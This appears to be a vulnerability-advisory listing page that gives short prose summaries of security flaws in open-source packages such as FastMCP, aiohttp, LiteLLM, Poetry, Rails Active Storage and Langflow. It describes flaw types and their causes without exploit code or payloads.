FastMCP OpenAPI Provider Has An SSRF & Path Traversal Vulnerability

Technical Description The "OpenAPIProvider" in FastMCP exposes internal APIs to MCP clients by parsing OpenAPI specifications. The "RequestDirector" class is responsible for constructing HTTP requests to the backend service. A critical vulnerability exists in the "buildurl" method. When an OpenAP...

SQL Injection

alerta-server is vulnerable to SQL Injection. The vulnerability is due to direct interpolation of user-supplied query parameters into SQL statements without sanitization, which allows an attacker to inject and execute arbitrary SQL queries...

AIOHTTP Leaks Cookie And Proxy-Authorization Headers On Cross-origin Redirect

Summary When following redirects to a different origin, aiohttp drops the Authorization header, but retains the Cookie and Proxy-Authorization headers. Impact The Cookie and Proxy-Authorizations headers could contain sensitive information which may be leaked to an unintended party after following...

Authentication Bypass

litellm is vulnerable to Authentication Bypass. The vulnerability is due to weak cache key generation using only the first 20 characters of JWT tokens, which allows an attacker to craft a token with a matching prefix and gain unauthorized access by inheriting another user’s identity...

Cross-Origin Data Theft

Glances is vulnerable to Cross-Origin Data Theft via XML-RPC Server CORS Misconfiguration. The vulnerability is due to the XML-RPC handler not validating the Content-Type header, where an attacker-controlled webpage can issue a CORS simple request containing a valid XML-RPC payload, and the serve...

Poetry Has Wheel Path Traversal Which Can Lead To Arbitrary File Write

Summary A crafted wheel can contain ../ paths that Poetry writes to disk without containment checks, allowing arbitrary file write with the privileges of the Poetry process. Impact Arbitrary file write path traversal from untrusted wheel content. Impacts users/CI/CD systems installing malicious o...

SQL Injection

baserCMS is vulnerable to SQL injection. The vulnerability is due to insufficient input validation in the blog post functionality, where malicious SQL may be executed in blog posts and attackers can inject crafted SQL statements to manipulate the database...

Remote Code Execution

D-Tale is vulnerable to Remote Code Execution. The vulnerability is due to the use of redis or shelf storage layer, where users hosting D-Tale publicly could allow attackers to run malicious code on the server...

JupyterHub Has An Open Redirect Vulnerability

Affected Version JupyterHub = 5.4.3 Impact An open redirect vulnerability in JupyterHub =5.4.3 allows attackers to construct links which, when clicked, take users to the JupyterHub login page, after which they are sent to an arbitrary attacker-controlled site outside JupyterHub instead of a...

Privilege Escalation

LiteLLM is vulnerable to Privilege Escalation. The vulnerability is due to missing admin authorization checks on the /config/update endpoint, which allows an authenticated attacker to modify configurations, execute arbitrary code, and access sensitive data...

Path Traversal

ONNX is vulnerable to Path Traversal. The vulnerability is due to improper handling of symlinks allowing directory traversal, which allows an attacker to access and read arbitrary files outside the intended directory...

Improper Privilege Management

ci4-cms-erp/ci4ms is vulnerable to Cross-Site Scripting XSS. The vulnerability is due to improper sanitization and output encoding of user-controlled profile name input, which allows an attacker to inject and execute malicious JavaScript in application views...

PhpMyFAQ Has A LIKE Wildcard Injection In Search.php — Unescaped % And _ Metacharacters Enable Broad Content Disclosure

Summary The "searchCustomPages" method in "phpmyfaq/src/phpMyFAQ/Search.php" uses "realescapestring" via "escape" to sanitize the search term before embedding it in LIKE clauses. However, "realescapestring" does not escape SQL LIKE metacharacters "%" match any sequence and "" match any single...

OS Command Injection

baserCMS is vulnerable to OS command injection. The vulnerability is due to insufficient validation in the installer, where user‑controlled input is passed to the operating system and attackers can execute arbitrary commands by accessing the uninstalled application...

Arbitrary Code Injection

org.springframework.ai:spring-ai-vector-store is vulnerable to Arbitrary Code Injection. The vulnerability is due to unsafe use of user-supplied input as a filter expression key in SimpleVectorStore, which allows an attacker to inject malicious expressions and execute arbitrary code...

Improper Access Control

Cilium is vulnerable to improper access control. The vulnerability is due to missing validation of non-existent or unattached AWS security group IDs in egress policies, which allows an attacker to gain broader outbound network access than intended by the policy configuration...

Arbitrary Code Execution.

@anthropic-ai/claude-code is vulnerable to Arbitrary code execution. The vulnerability is due to improper parsing of shell commands involving $IFS and short CLI flags, which allows an attacker to bypass read-only validation and execute arbitrary code by injecting untrusted content into the contex...

Improper Access Control

github.com/mattermost/mattermost is vulnerable to improper access control. The vulnerability is due to insufficient validation of user permissions when accessing files and subscribing to board blocks, which allows an authenticated attacker to access files and subscribe to blocks from boards they...

Improper Certificate Validation

github.com/envoyproxy/envoy is vulnerable to improper certificate validation. The vulnerability is due to incorrect handling of embedded null bytes \0 in OTHERNAME SAN values within mTLS certificate matching, which allows an attacker to bypass certificate validation and achieve unauthorized acces...

Improper Input Validation

github.com/eclipse/paho.mqtt.golang is vulnerable to improper input validation. The vulnerability is due to unsafe conversion of string length from int32/int64 to int16 without overflow checks, which allows an attacker to craft oversized UTF-8 inputs that cause packet corruption or unintended dat...

Prototype Pollution

Axios is vulnerable to Prototype Pollution. The vulnerability is due to the mergeConfig function crashing with a TypeError when processing configuration objects containing proto as an own property, where an attacker can trigger this by providing a malicious configuration object created via...

Predictable UUID Generation

github.com/gofiber/utils is vulnerable to predictable UUID generation.The vulnerability is due to fallback to predictable UUID values when crypto/rand.Read fails, which allows an attacker to guess UUIDs and exploit security-critical operations relying on them...

Improper Authentication

github.com/1panel-dev/1panel is vulnerable to improper authentication.The vulnerability is due to improper server-side validation of a client-controlled parameter, which allows an unauthenticated attacker to bypass CAPTCHA protections and perform automated login attempts leading to potential...

Server-Side Request Forgery (SSRF)

github.com/zitadel/zitadel is vulnerable to an unauthenticated full-read Server-Side Request Forgery SSRF. The vulnerability is due to improper trust of the x-zitadel-forward-host header in the Login UI V2, which allows an attacker to force the server to make arbitrary HTTP requests and read...

DOM-Based Cross-Site Scripting (XSS)

github.com/zitadel/zitadel, is vulnerable to DOM-Based Cross-Site Scripting XSS. The vulnerability is due to improper validation of the postlogoutredirect parameter in the /logout endpoint, which allows an unauthenticated remote attacker to execute malicious JavaScript in users’ browsers...

Race Condition

@auth0/nextjs-auth0 is vulnerable to a race condition. The vulnerability is due to improper lookup handling in the TokenRequestCache during simultaneous requests on the same client, which allows an attacker to exploit inconsistent token responses and potentially interfere with authentication flow...

Denial Of Service (DoS)

github.com/quic-go/quic-go is vulnerable to a Denial Of Service DoS. The vulnerability is due to missing limits on the size of decoded HTTP/3 headers from QPACK-encoded HEADERS frames, which allows an attacker to send crafted requests with large header fields to trigger excessive memory allocatio...

Rails Active Storage Has A Possible DoS Vulnerability In Proxy Mode Via Multi-range Requests

Impact Active Storage's proxy controller does not limit the number of byte ranges in an HTTP Range header. A request with thousands of small ranges causes disproportionate CPU usage compared to a normal request for the same file, possibly resulting in a DoS vulnerability. Releases The fixed...

Path Traversal

Active Storage is vulnerable to Path Traversal. The vulnerability is due to Active Storage's DiskServicepathfor not validating that the resolved filesystem path remains within the storage root directory, where a blob key containing path traversal sequences e.g. ../ could allow reading, writing, o...

Arbitrary Code Injection

Langflow is vulnerable to Arbitrary Code Injection. The vulnerability is due to the validation process dynamically executing LLM‑generated Python code via exec, where the validation routine runs the generated code and an attacker who can influence the model output can achieve arbitrary server‑sid...

Remote Code Execution (RCE)

Indico is vulnerable to Remote Code Execution RCE. The vulnerability is due to improper sanitization of LaTeX input allowing bypass via crafted syntax, which allows an attacker to read local files or execute arbitrary code on the server when LaTeX rendering is enabled...

Denial Of Service (DoS)

Active Support is vulnerable to Denial of Service. The vulnerability is due to the acceptance of strings containing scientific notation by Active Support number helpers, where the conversion of these strings to extremely large decimal representations can cause excessive memory allocation and CPU...

Privilege Escalation

Signify is vulnerable to Privilege Escalation. The vulnerability is due to improper Authenticode signature validation in signeddata.py and context.py, where a remote attacker can escalate privileges via these components and exploit the vulnerability to gain elevated access...

Cryptography Has Incomplete DNS Name Constraint Enforcement On Peer Names

Summary In versions of cryptography prior to 46.0.5, DNS name constraints were only validated against SANs within child certificates, and not the "peer name" presented during each validation. Consequently, cryptography would allow a peer named "bar.example.com" to validate against a wildcard leaf...

Infinite Loop

pypdf is vulnerable to an Infinite Loop. The vulnerability is due to reading a file in non‑strict mode during dictionary recovery, where the DictionaryObject.readfromstream method can enter an infinite loop and an attacker can craft a PDF to trigger it...

Deserialization Of Untrusted Data

Saloon is vulnerable to Deserialization Of Untrusted Data. The vulnerability is due to unsafe use of PHP’s unserialize with allowedclasses enabled when restoring OAuth token state, which allows an attacker to supply malicious serialized objects and trigger execution of arbitrary code via gadget...

Server-side Template Injection

giskard-agents is vulnerable to server-side template injection. The vulnerability is due to the ChatWorkflow.chat method passing its string argument directly to a non‑sandboxed Jinja2 Environment, where the input string is treated as a template by inlineenv.fromstring and an attacker can supply...

Improper Authorization

Langflow is vulnerable to an Improper Authorization. The vulnerability is due to improper access control in the readflow helper, which failed to enforce ownership validation when authentication was enabled, allowing an authenticated attacker to read, modify, or delete flows belonging to other...

Session Hijacking

MCP Ruby SDK is vulnerable to Session Hijacking. The vulnerability is due to insufficient session binding, where an attacker who obtains a valid session ID can completely hijack the victim's Server-Sent Events SSE stream and intercept all real-time data...

Cross Site Scripting

Active Support is vulnerable to Cross Site Scripting. The vulnerability is due to SafeBuffer% not propagating the @htmlunsafe flag to the newly created buffer, where a SafeBuffer is mutated in place and then formatted with % using untrusted arguments, and the result incorrectly reports htmlsafe? ...

Improper Input Validation

activestorage is vulnerable to Improper Input Validation. The vulnerability is due to unescaped use of blob keys in Dir.glob within DiskServicedeleteprefixed, which allows an attacker to inject glob metacharacters and delete unintended files from the storage directory...

Denial Of Service

Active Storage is vulnerable to Denial of Service. The vulnerability is due to the proxy controller loading the entire requested byte range into memory before sending it, where a request with a large or unbounded Range header could cause the server to allocate memory proportional to the file size...

Remote Code Execution (RCE)

ruby-lsp is vulnerable to Remote Code Execution RCE. The vulnerability is due to unsanitized interpolation of the rubyLsp.branch setting into a generated Gemfile, which allows an attacker to inject malicious code that executes when a user opens a crafted project...

Cross-Site Scripting

Home Assistant is vulnerable to Cross-Site Scripting. The vulnerability is due to an authenticated party adding a malicious name to their device entity, where the malicious name allows for Cross-Site Scripting attacks against anyone who can see a dashboard with a Map-card which includes that...

Path Traversal

saloonphp/saloon is vulnerable to Path Traversal. The vulnerability is due to lack of validation of fixture names used in file path construction, which allows an attacker to manipulate paths and read or write arbitrary files outside the intended directory...

Server-Side Request Forgery

pyLoad is vulnerable to Server-Side Request Forgery. The vulnerability is due to the download engine accepting arbitrary URLs without validation, where an authenticated attacker can exploit this to access internal network services and exfiltrate cloud provider metadata...

Environment Variable Leak

changedetection.io is vulnerable to Environment Variable Leak. The vulnerability is due to the use of the jq env builtin in include filter expressions, where an authenticated user can leak sensitive environment variables including SALTEDPASS, PLAYWRIGHTDRIVERURL, HTTPPROXY, and any secrets passed...

Cross-Site Scripting

Home Assistant is vulnerable to Cross Site Scripting. The vulnerability is due to the lack of output escaping or sanitization in the History-graph card, where an attacker can inject arbitrary tags that execute JavaScript by changing the name of a sensor to a malicious value...

Arbitrary Code Injection

froxlor/froxlor is vulnerable to Arbitrary Code Injection. The vulnerability is due to improper validation of DNS record content in the DomainZones.add endpoint, which allows an attacker to inject malicious directives into zone files and manipulate DNS configuration...

Server-Side Request Forgery (SSRF)

saloonphp/saloon is vulnerable to Server-Side Request Forgery SSRF. The vulnerability is due to improper validation of request endpoints allowing absolute URLs to override the base URL, which allows an attacker to redirect requests to malicious hosts and potentially exfiltrate sensitive data such...